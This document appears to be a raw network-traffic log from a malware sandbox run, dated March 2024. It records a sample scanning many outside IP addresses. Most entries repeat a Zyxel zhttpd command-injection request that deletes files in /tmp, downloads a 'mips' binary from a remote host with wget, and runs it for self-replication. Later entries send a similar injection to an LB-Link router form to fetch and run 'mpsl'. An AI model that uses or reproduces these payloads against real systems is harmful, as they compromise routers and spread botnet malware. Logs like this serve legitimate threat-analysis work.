                                        Mar 31, 2024 09:22:54.969441891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9650192.168.2.23565288.83.232.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:54.969480991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9651192.168.2.235399659.102.91.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:54.969599009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9652192.168.2.2347478108.48.197.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:54.969801903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9653192.168.2.2354510164.22.71.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:54.969892979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9654192.168.2.2358080146.126.76.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:54.969952106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9655192.168.2.2344668175.59.58.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:55.973069906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9656192.168.2.235546243.42.236.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:55.973119974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9657192.168.2.233489873.250.69.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:55.973167896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9658192.168.2.2340934148.95.165.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:55.973225117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9659192.168.2.2334378152.214.127.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:55.973438978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9660192.168.2.233332825.21.115.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:55.973479033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9661192.168.2.2341064179.40.68.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:55.973512888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9662192.168.2.2353256110.146.13.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:56.976583958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9663192.168.2.2360520208.107.97.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:56.976629972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9664192.168.2.2350004213.232.60.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:56.976681948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9665192.168.2.2341706151.216.151.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:56.976742983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9666192.168.2.2340880209.26.120.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:56.976789951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9667192.168.2.2344130179.160.219.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:56.976988077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9668192.168.2.2341754108.128.76.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:56.977025032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9669192.168.2.2341898155.19.91.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980374098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9670192.168.2.235340435.60.181.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980427980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9671192.168.2.2339728169.76.173.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980503082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9672192.168.2.233554661.142.119.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980561972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9673192.168.2.2345976118.153.224.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980597973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9674192.168.2.2334978189.225.111.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980664015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9675192.168.2.2347332175.220.129.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980707884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9676192.168.2.2343784135.90.49.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980763912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9677192.168.2.233689667.148.244.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980825901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9678192.168.2.235301064.30.139.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980865955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9679192.168.2.2332870173.240.41.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980922937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9680192.168.2.2337142175.187.227.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.980959892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9681192.168.2.2351246193.40.22.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:57.981384993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9682192.168.2.2358780161.89.10.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.984534979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9683192.168.2.235042417.203.226.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.984591007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9684192.168.2.234589865.254.7.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.984639883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9685192.168.2.23425268.108.100.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.984714985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9686192.168.2.2344374110.179.251.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.984755993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9687192.168.2.2351636122.7.87.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.984796047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9688192.168.2.233597644.118.30.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.984841108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9689192.168.2.2354662200.18.240.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.984888077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9690192.168.2.2351028171.93.189.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.984915018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9691192.168.2.23526565.152.55.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.985219002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9692192.168.2.2337030159.120.224.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:58.985254049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9693192.168.2.2344980194.15.104.768080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.231154919 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:59.451545954 CEST1286INHTTP/1.0 400 Bad Request
                                        Server: squid/3.1.23
                                        Mime-Version: 1.0
                                        Date: Sun, 31 Mar 2024 06:40:26 GMT
                                        Content-Type: text/html
                                        Content-Length: 3182
                                        X-Squid-Error: ERR_INVALID_URL 0
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9694192.168.2.2357838192.126.154.578080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.394766092 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:59.570569992 CEST1286INHTTP/1.1 400 Bad Request
                                        Server: squid/3.5.20
                                        Mime-Version: 1.0
                                        Date: Sun, 31 Mar 2024 07:21:02 GMT
                                        Content-Type: text/html;charset=utf-8
                                        Content-Length: 3469
                                        X-Squid-Error: ERR_INVALID_URL 0
                                        Connection: close
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 